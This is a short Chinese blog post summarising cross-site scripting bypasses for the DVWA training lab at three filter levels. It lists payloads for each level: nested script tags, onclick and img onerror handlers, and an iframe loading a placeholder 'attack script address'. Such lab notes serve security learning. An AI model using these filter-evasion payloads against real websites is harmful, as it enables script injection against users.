DVWA的Xss跨站总结
2024-09-12 07:23:44
Xss跨站总结
初级防护的代码
Poc:<script>alert(1)</script>
上图防护的代码 为输入的结果就为输出的结果
中级防护的代码
Poc:<scri<script>pt>alert(1)</script>
上图为输入的文本中只要包含<script>就给替换成空
解决思路:<scri<script>pt>alert(1)</script> 在<script>中再添加一个<script> 后添加的<script>替换为空但是外面的<script>依旧可以拼接起来。
高级防护的代码
图上为只要包含script就替换掉
解决方法:
<a href=” onclick=alert(‘xss’)>zet</a> #创建一个点击键zet点击后执行onclick=alert(‘xss’)
<img src=http://172.16.1.23/a.jpg onerror=alert(‘xss’)> #当错误时执行alert(‘xss’)
<iframe width=300 height=100 src=”http://攻击脚本地址”></iframe>
最新文章
- windows forms 上一个类似于wpf snoop 的工具: Hawkeye
- 关于WPF中ItemsControl系列控件中Item不能继承父级的DataContext的解决办法
- C#学习之LinqtoSql类的简单例子
- CSV 文件读取类
- 测试peerdroid示例程序步骤
- 集合框架Map之entrySet方法的使用
- Jquery zTree的使用
- Centos安装成功mysql-5.5.37
- codeforces D. Multiplication Table
- 如何为 setTimeout() 方法传参
- 用Web抓包分析工具Livepool 实现本地替换开发
- 遍历文件 创建XML对象 方法 python解析XML文件 提取坐标计存入文件
- hihoCoder1310 岛屿 (dfs)
- 初识 go 语言
- 腾讯开源项目phxpaxos的编译步骤
- Stable Fur Generation on Mesh
- mysql语句-DML语句
- SpringBoot------连接MySQL报错:The server time zone value 'Öйú±ê׼ʱ¼ä' is unrecognized
- vi分屏指令
- Java技术学习路线笔记:Maven安装和作用